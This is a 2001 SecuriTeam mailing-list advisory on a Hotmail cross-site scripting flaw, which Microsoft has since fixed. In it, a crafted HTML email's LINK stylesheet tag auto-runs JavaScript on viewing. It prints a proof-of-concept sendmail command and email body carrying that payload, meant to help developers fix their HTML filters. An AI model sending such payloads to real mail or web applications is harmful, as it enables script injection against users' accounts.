[NEWS] Hotmail LINK CSS Vulnerability (New Strain)

From: support@securiteam.com
Date: 08/26/01


From: support@securiteam.com
To: list@securiteam.com
Subject: [NEWS] Hotmail LINK CSS Vulnerability (New Strain)
Message-Id: <20010826061009.5D53D138BF@mail.der-keiler.de>
Date: Sun, 26 Aug 2001 08:10:09 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Hotmail LINK CSS Vulnerability (New Strain)
------------------------------------------------------------------------

SUMMARY

A new Cross Site Scripting (CSS) vulnerability carriers with it
potentially serious security implications, that go beyond the Microsoft
Hotmail system. This vulnerability and these types of vulnerabilities
(CSS) affect many more HTML aware web applications.

The below Cross Site Scripting vulnerability is believed to be a new
strain of CSS. Web application developers and security engineers are urged
to check and update their current HTML filters in all HTML aware web
applications. This includes Webmail, On-line Auctions, Message Boards,
HTML Chats, Guest Books, etc.

NOTE: Microsoft was advised of this issue Aug 21, 2001 and issued a fix by
Aug 23, 2001. Hotmail is no longer vulnerable to this problem.

DETAILS

This is a simple proof of concept vulnerability that illustrates how the
sending of a crafted HTML email with the enclosed body will auto-execute
JavaScript when the email is read.

** NOTE: Example tested under Netscape 4.77 **

==============================================

* WebMail Example *
sendmail -t <target>@hotmail.com

MIME-Version: 1.0
From: The Attacker <foos@bar.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: LINK TAG JavaScript Execution Example

<HTML><BODY>

<LINK REL=STYLESHEET TYPE="text/javascript" SRC="javascript_path.js">

</BODY></HTML>

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.